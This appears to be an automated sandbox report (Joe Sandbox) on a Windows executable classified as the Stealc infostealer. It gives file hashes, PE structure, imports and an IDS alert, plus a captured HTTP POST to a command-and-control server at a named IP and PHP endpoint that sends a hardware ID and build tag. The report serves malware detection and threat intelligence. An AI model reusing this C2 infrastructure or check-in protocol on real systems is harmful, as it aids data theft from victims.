                                      http://185.201.252.118/ef952bc0f542da4b.php&zV4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://185.201.252.118/ef952bc0f542da4b.php/4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.201.252.118
                                          unknownNetherlands
                                          44241INFRANET-ASITtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1540239
                                          Start date and time:2024-10-23 15:41:06 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 34s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:4M3JIACIWk.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:0bc1c014e9e5d1b09d1cf2ba0e521c79.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@2/5@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 23
                                          • Number of non-executed functions: 166
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • VT rate limit hit for: 4M3JIACIWk.exe
                                          TimeTypeDescription
                                          09:42:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          185.201.252.118AUCgzsQbyJ.exeGet hashmaliciousStealcBrowse
                                          • 185.201.252.118/ef952bc0f542da4b.php
                                          X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                          • 185.201.252.118/ef952bc0f542da4b.php
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          INFRANET-ASITAUCgzsQbyJ.exeGet hashmaliciousStealcBrowse
                                          • 185.201.252.118
                                          X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                          • 185.201.252.118
                                          DocuSign2.exeGet hashmaliciousUnknownBrowse
                                          • 185.201.252.24
                                          file.exeGet hashmaliciousSystemBCBrowse
                                          • 185.201.254.98
                                          JSjL2eRBWYGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.201.254.126
                                          FWMUofbMEx.exeGet hashmaliciousRedLineBrowse
                                          • 185.201.252.33
                                          Yw1lsl5Uee.exeGet hashmaliciousRedLineBrowse
                                          • 185.201.252.33
                                          E05rh4L9R4.exeGet hashmaliciousRedLineBrowse
                                          • 185.201.252.33
                                          No context
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9629086815726382
                                          Encrypted:false
                                          SSDEEP:96:oAipO4qs7h3p7qnSQXIDcQpc6W9bcEKcw3c+HbHg/8BRTf3o8Fa9OyRgTvXNtZrn:UpPq70niBQpj/XZrP2KzuiF0Z24IO8L
                                          MD5:DBA57899E57634B7AB9EFE3DE1BE8FF5
                                          SHA1:F0444136A7FED0286CFD00EF5D43AC59165106D0
                                          SHA-256:0CBAC11800179F72E3E4711B38E40FD39216CE6880C195C2B43784D3B49F372E
                                          SHA-512:E37B42FB167C0CA6F4402EB9E7021D14F215FA2D067C45A1BC0685D3939AA6A84151EA4E473A923C2D0EBF9FA0FED61C9DD6D9405F7DC9E6BD71BAF689F5E642
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.1.6.4.5.2.3.4.4.1.2.4.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.1.6.4.5.2.4.1.4.4.3.7.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.c.8.a.5.b.3.-.1.7.6.1.-.4.a.9.0.-.b.d.d.2.-.1.b.c.a.3.3.a.5.7.0.0.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.e.5.1.1.1.1.-.7.e.f.6.-.4.8.8.3.-.9.2.0.c.-.c.4.8.5.5.4.1.b.e.a.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.M.3.J.I.A.C.I.W.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.8.4.-.0.0.0.1.-.0.0.1.4.-.9.2.d.3.-.2.4.5.4.5.1.2.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.8.e.0.f.c.4.b.1.a.e.e.9.4.c.2.8.e.6.6.a.c.0.c.0.3.e.2.6.1.4.0.0.0.0.f.f.f.f.!.0.0.0.0.3.c.8.c.8.7.2.d.9.0.b.3.0.8.9.4.4.d.9.7.9.b.0.3.3.b.4.8.8.7.0.f.1.d.2.9.3.4.d.b.!.4.M.3.J.I.A.C.I.W.k...e.x.e.....T.a.r.g.e.t.A.p.p.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Wed Oct 23 13:42:03 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):60654
                                          Entropy (8bit):1.8050824143016486
                                          Encrypted:false
                                          SSDEEP:192:DXPqXhAlFXQOQOJwyl+esHMvLyMvaDXzrtaOiWl3St9Q+4lEUHB4RZjihl:KAl5QExliHGLyKtOR3dlEZRZjQ
                                          MD5:C0B3F2124C563853A76332D02061D96E
                                          SHA1:63A44687FBC73891A67CFB52432A49577E9ED4DF
                                          SHA-256:9353E380F3FD93A33B4FB47BC2038370AFF20B49EA0F6AB5D314BB943DEED7CE
                                          SHA-512:52B7778D67530F252D4BF15F089B2C689138A6A4662071CD1C4313F0C5F30195B75AC191CD7FCC45CA12C271C8B92997297670788DDA93198B3A19C528B3CE50
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... .......+..g............4...............<............*..........T.......8...........T...........P3..........................................................................................................eJ......H.......GenuineIntel............T...........%..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8334
                                          Entropy (8bit):3.7014431260016023
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJtg66z6YEIxSUwugmfJGripDy89bhUsf8Lm:R6lXJK6W6YEeSUwugmfJGrkhHf9
                                          MD5:BF6FF3FB4C4C490C9681D0859A879106
                                          SHA1:90CA333368C22C9B4F9005ABD4A765E0E4EB9454
                                          SHA-256:5C4C104E07F61A633724714FB4AE40CC72D95675B783F9BB7BED431590E8461E
                                          SHA-512:5EDBFA596E8188AB62D64BF842A1690BAB419C7D0B5F9557D2A1577A02BB3F96D894C046C22F083505EF6EA38319DA36B31F25CB29B93714F050BC2B4AD671F1
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.9.6.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4579
                                          Entropy (8bit):4.482639493759417
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsnJg77aI9idWpW8VYIdYYm8M4JOLrKFe+q81dGud2ifWId:uIjfJI7Ys7VPJOfNEdjd2ifWId
                                          MD5:EABD2EB88F7EEA0C05E9E51391B6D657
                                          SHA1:CEF908706DE808B097361671FE0301158003BB04
                                          SHA-256:0B195D8BF4FAA545907197F712B91CD30BFE6149CADE6C620C7624190A115387
                                          SHA-512:F9315C148AC76D48C42DE27D52EFB723FB3EAE6FF9AA317855D85851F130BF4F5DAA17BA85EE6591496EB49B4A0A2F0D3E666B2A6162B1FAB2A902B86B65845E
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="556124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421557916333658
                                          Encrypted:false
                                          SSDEEP:6144:8Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNz0uhiTw:nvloTMW+EZMM6DFy903w
                                          MD5:BC9F1FB03E3F3FF9E3DBBCD0F36F5DDE
                                          SHA1:8E299378E9BBBB579DCEBF296ECE95556913789B
                                          SHA-256:E2BF4A347CD0DBC9F10BC6F989BBB5C23B3AE92912EE924569E010DE19A93A15
                                          SHA-512:1C911FE5705AE34F1DBC68A8801FF97B7D38123082CF7D9720F956050CA1A7CA47D4EC2E13496CD51828342D04CB0A304A60E0DF968624633DDB23B5AA28612C
                                          Malicious:false
                                          Reputation:low
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmvW.WQ%.................................................................................................................................................................................................................................................................................................................................................c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.7347912152991976
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                          • InstallShield setup (43055/19) 0.43%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:4M3JIACIWk.exe
                                          File size:350'208 bytes
                                          MD5:0bc1c014e9e5d1b09d1cf2ba0e521c79
                                          SHA1:3c8c872d90b308944d979b033b48870f1d2934db
                                          SHA256:c7bbcad5b7a6cb9a404c4b6077cd657f6d24a98b5b7c4a399aef65a709e73f95
                                          SHA512:33cb663758371e41687d7e13bacef81061e010a82dcfd10fe4261bf842d5ad6aa03699ac129bd306e9245c9392cdc5ceccac9b4b856c9511db382950915eba16
                                          SSDEEP:6144:oCm3W5o8zXGDfCRg1sm/9zXrOEjUNIzUnvCMcbp+W258bwc:+3W5o8zXGDfCRgHzXaE4NIonv7s+W2J
                                          TLSH:DA74AE906AF69436F7F78A366A30B6D45A3BF8A36971C17E21102A0F1D716D08D36733
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aLLb..Lb..Lb...-..Mb..R0..Wb..R0..]b..R0...b..k.t.Kb..Lb..;b..R0..Mb..R0..Mb..R0..Mb..RichLb..........................PE..L..
                                          Icon Hash:17694cb2b24d2117
                                          Entrypoint:0x401355
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6603BA6B [Wed Mar 27 06:19:23 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:6819dd824bc2d02263bbcf0f103eebe1
                                          Instruction
                                          call 00007F0440D941D5h
                                          jmp 00007F0440D9233Dh
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 00000328h
                                          mov dword ptr [0043C478h], eax
                                          mov dword ptr [0043C474h], ecx
                                          mov dword ptr [0043C470h], edx
                                          mov dword ptr [0043C46Ch], ebx
                                          mov dword ptr [0043C468h], esi
                                          mov dword ptr [0043C464h], edi
                                          mov word ptr [0043C490h], ss
                                          mov word ptr [0043C484h], cs
                                          mov word ptr [0043C460h], ds
                                          mov word ptr [0043C45Ch], es
                                          mov word ptr [0043C458h], fs
                                          mov word ptr [0043C454h], gs
                                          pushfd
                                          pop dword ptr [0043C488h]
                                          mov eax, dword ptr [ebp+00h]
                                          mov dword ptr [0043C47Ch], eax
                                          mov eax, dword ptr [ebp+04h]
                                          mov dword ptr [0043C480h], eax
                                          lea eax, dword ptr [ebp+08h]
                                          mov dword ptr [0043C48Ch], eax
                                          mov eax, dword ptr [ebp-00000320h]
                                          mov dword ptr [0043C3C8h], 00010001h
                                          mov eax, dword ptr [0043C480h]
                                          mov dword ptr [0043C37Ch], eax
                                          mov dword ptr [0043C370h], C0000409h
                                          mov dword ptr [0043C374h], 00000001h
                                          mov eax, dword ptr [0043B004h]
                                          mov dword ptr [ebp-00000328h], eax
                                          mov eax, dword ptr [0043B008h]
                                          mov dword ptr [ebp-00000324h], eax
                                          call dword ptr [000000D4h]
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3988c0x50.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x11b0000x17b48.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x380000x19c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x36c500x36e003779c8e3dbd02971eb9459ef81598609False0.8355815774487472data7.485371704883883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x380000x21fa0x22006009238c7e174df4828e252a1b1cc8d9False0.37385110294117646data5.59558962454967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x3b0000xdf6800x4800df930f96a9cbf26b0e6ee3512a950d5cFalse0.05088975694444445data0.6177492689585721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x11b0000x145b480x17c00594c65639afb3962a5c5caa39d67bbe3False0.4697985197368421data5.095954536512385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x11b8500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5613006396588486
                                          RT_ICON0x11c6f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6322202166064982
                                          RT_ICON0x11cfa00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6768433179723502
                                          RT_ICON0x11d6680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7413294797687862
                                          RT_ICON0x11dbd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5067427385892116
                                          RT_ICON0x1201780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6057692307692307
                                          RT_ICON0x1212200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6012295081967213
                                          RT_ICON0x121ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7473404255319149
                                          RT_ICON0x1220880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.40085287846481876
                                          RT_ICON0x122f300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.49954873646209386
                                          RT_ICON0x1237d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5236175115207373
                                          RT_ICON0x123ea00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5585260115606936
                                          RT_ICON0x1244080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.35466804979253114
                                          RT_ICON0x1269b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.3820356472795497
                                          RT_ICON0x127a580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4045081967213115
                                          RT_ICON0x1283e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.42109929078014185
                                          RT_ICON0x1288c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39125799573560766
                                          RT_ICON0x1297680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5496389891696751
                                          RT_ICON0x12a0100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6117511520737328
                                          RT_ICON0x12a6d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                          RT_ICON0x12ac400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4169793621013133
                                          RT_ICON0x12bce80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4086065573770492
                                          RT_ICON0x12c6700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                          RT_STRING0x12cce80x114data0.532608695652174
                                          RT_STRING0x12ce000x6b4data0.432983682983683
                                          RT_STRING0x12d4b80x61edata0.43039591315453385
                                          RT_STRING0x12dad80x3ccdata0.4588477366255144
                                          RT_STRING0x12dea80x7fcdata0.42025440313111545
                                          RT_STRING0x12e6a80x7c2data0.4174219536757301
                                          RT_STRING0x12ee700x67adata0.439686369119421
                                          RT_STRING0x12f4f00x8a4data0.4159132007233273
                                          RT_STRING0x12fd980x6a6data0.43478260869565216
                                          RT_STRING0x1304400x6cedata0.43398392652123996
                                          RT_STRING0x130b100x780data0.4270833333333333
                                          RT_STRING0x1312900x5d6data0.4404283801874163
                                          RT_STRING0x1318680x738data0.42803030303030304
                                          RT_STRING0x131fa00x6c6data0.43252595155709345
                                          RT_STRING0x1326680x4e0data0.45032051282051283
                                          RT_GROUP_ICON0x1288480x76dataTurkishTurkey0.6694915254237288
                                          RT_GROUP_ICON0x1220100x76dataTurkishTurkey0.6610169491525424
                                          RT_GROUP_ICON0x12cad80x68dataTurkishTurkey0.7211538461538461
                                          RT_VERSION0x12cb400x1a8data0.5731132075471698
                                          DLLImport
                                          KERNEL32.dllGetNumaProcessorNode, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, CancelWaitableTimer, InterlockedCompareExchange, GetModuleHandleW, GetConsoleCP, GlobalAlloc, FatalAppExitW, CopyFileW, GetSystemWow64DirectoryW, DeleteVolumeMountPointW, GetStringTypeExW, HeapCreate, GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetACP, RaiseException, SetLastError, PeekNamedPipe, MoveFileW, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, SetCalendarInfoW, WritePrivateProfileStringA, SetCommMask, FindAtomA, FreeEnvironmentStringsW, PurgeComm, GetVersionExA, ReadConsoleOutputCharacterW, OpenFileMappingA, LCMapStringW, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, GetProcAddress, GetComputerNameA, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, GetLastError, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                          USER32.dllSetFocus
                                          ADVAPI32.dllQueryServiceLockStatusW
                                          Language of compilation systemCountry where language is spokenMap
                                          TurkishTurkey
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-23T15:42:03.643810+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549705185.201.252.11880TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 23, 2024 15:42:02.114034891 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:02.120233059 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:02.120311975 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:02.120460987 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:02.126580000 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:02.935492992 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:02.935620070 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:03.405572891 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:03.411448956 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:03.643719912 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:03.643810034 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:08.762376070 CEST8049705185.201.252.118192.168.2.5
                                          Oct 23, 2024 15:42:08.762589931 CEST4970580192.168.2.5185.201.252.118
                                          Oct 23, 2024 15:42:23.507165909 CEST4970580192.168.2.5185.201.252.118
                                          • 185.201.252.118
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549705185.201.252.118804996C:\Users\user\Desktop\4M3JIACIWk.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 23, 2024 15:42:02.120460987 CEST90OUTGET / HTTP/1.1
                                          Host: 185.201.252.118
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Oct 23, 2024 15:42:02.935492992 CEST203INHTTP/1.1 200 OK
                                          Date: Wed, 23 Oct 2024 13:42:02 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Oct 23, 2024 15:42:03.405572891 CEST419OUTPOST /ef952bc0f542da4b.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE
                                          Host: 185.201.252.118
                                          Content-Length: 217
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 35 42 41 33 31 42 42 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a
                                          Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="hwid"9A5BA31BBDD81263800096------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build"LogsDiller------JDAFHCGIJECFHIDGDBKE--
                                          Oct 23, 2024 15:42:03.643719912 CEST210INHTTP/1.1 200 OK
                                          Date: Wed, 23 Oct 2024 13:42:03 GMT
